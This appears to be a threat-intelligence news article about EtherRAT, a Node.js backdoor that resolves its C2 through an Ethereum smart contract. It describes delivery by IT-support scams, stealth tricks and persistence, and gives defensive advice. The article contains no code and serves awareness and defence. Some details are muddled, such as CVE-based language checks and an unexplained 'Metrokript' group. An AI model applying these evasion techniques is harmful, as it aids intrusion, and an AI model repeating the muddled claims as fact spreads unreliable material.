Cybersecurity Experts Warn of EtherRAT: A Node.js Backdoor Using Ethereum Blockchain
In a disconcerting development, cybersecurity experts have revealed that hackers are increasingly exploiting the Ethereum blockchain to deploy and manage a sophisticated Node.js backdoor known as EtherRAT. This malicious software employs a covert technique referred to as EtherHiding aimed at concealing its command-and-control (C2) infrastructure, rendering it challenging for cybersecurity professionals to disrupt its operations.
EtherRAT has been previously flagged by cybersecurity firms, notably Sysdig, and has been associated with the infamous North Korean cyber activity dubbed “Contagious Interview.” This Node.js backdoor allows cybercriminals to execute arbitrary commands on infected systems, collect sensitive information such as credentials and cryptocurrency wallets, and conduct deep host fingerprinting to better understand their targets.
Recent insights from eSentire’s Threat Response Unit (TRU) have highlighted alarming parallels between EtherRAT and the Tsundere Malware-as-a-Service botnet. These similarities include their shared use of operating system fingerprinting commands, language checks based on Common Vulnerabilities and Exposures (CVE), dissemination through IT support scams, and extensive reliance on the free Obfuscator.io JavaScript obfuscator.
In March 2026, TRU made a significant discovery when EtherRAT was detected infiltrating a retail customer’s environment. This incident underscored a multi-faceted approach used by the attackers, encompassing social engineering techniques, the leveraging of Windows living-off-the-land binaries, and blockchain-based C2 resolution.
Understanding EtherRAT
The functionality of EtherRAT is built upon a C2 module dubbed “SYS_INFO,” which conducts meticulous host fingerprinting. This information permits threat actors to tailor their subsequent actions and payload deployments based on the system characteristics.
Most frequently observed in cyberattacks, TRU has noticed the use of Microsoft Teams-based IT support scams, often employing QuickAssist for interactive remote access to compromised systems. In a complex second stage, heavily encrypted using Obfuscator.io, the attackers decrypt and activate the EtherRAT payload stored in an encrypted configuration file, subsequently executing it and ensuring persistence through the creation of a deliberately named Windows Run key.
The intrusion chain initiated by the attackers commences with a multi-stage Node.js loader. This first stage involves decrypting an encrypted stager using AES-256-CBC and executing the next script from memory. This strategy is advantageous as it largely keeps malicious payloads off the disk during the initial stages, complicating detection efforts.
Adding to the stealth of the operation, persistence commands involve proxying the execution of node.exe through conhost.exe using undocumented arguments, allowing Metrokript criminals to simulate legitimate Windows process activities.
In one particular retail case, the attackers employed a ClickFix command to manipulate Indirect Command Execution, chaining processes to extract a malicious .hta file from a compromised site while cleverly obfuscating their command line to evade detection.
Once operational, the HTA file deploys the multi-stage Node.js loader, ultimately resulting in the activation of EtherRAT and configuring the host for C2 communications based on blockchain resolution. Rather than employing hard-coded C2 domains, EtherRAT creatively utilizes EtherHiding—retrieving C2 addresses via an Ethereum smart contract. This innovative approach transforms the blockchain into a resilient backbone for its C2 infrastructure.
In TRU’s investigation, a particular smart contract identified as 0xe26c57b7fa8de030238b0a71b3d063397ac127d3 was found to be recurrently utilized across multiple sectors including retail, business services, software, and finance. The attackers manipulated the contract’s setString function to frequently modify and rotate their C2 endpoints.
Countermeasures and Recommendations
To complicate detection, EtherRAT crafts beacon URLs that closely resemble routine CDN traffic, employing HTTPS encryption, standard API paths, and random hex strings, culminating in benign-looking file extensions such as .png or .css. By randomly generating query parameters, the malware obscures its operations, making it difficult for traditional detection methods to identify malicious activities.
EtherRAT’s capabilities also extend to enabling debug logging while supporting a reobfuscation routine. This sophisticated approach involves uploading its current source code to the C2, receiving a differently obfuscated version, thereby ensuring that static detection signatures are continually thwarted.
In response to these threats, cybersecurity analysts advise that organizations should implement stringent defensive measures. These include blocking unnecessary crypto-network RPC providers and deploying Next-Generation Antivirus (NGAV) or Endpoint Detection and Response (EDR) solutions capable of identifying both Node.js malware and living-off-the-land binary abuse. Additionally, enhancing awareness through phishing simulation and security training tailored to counter IT support scams can help organizations bolster their defenses against social engineering efforts.
As a proactive response, TRU has taken steps to isolate affected hosts, contain breaches, and implement updated detection mechanisms across various telemetry layers in their managed detection and response (MDR) frameworks. Organizations are also encouraged to disable mshta.exe and pcalua.exe whenever possible, limit access to system prompts, and invest in user training programs that simulate real-world phishing scenarios, thereby preparing their personnel to recognize and thwart sophisticated cyber threats.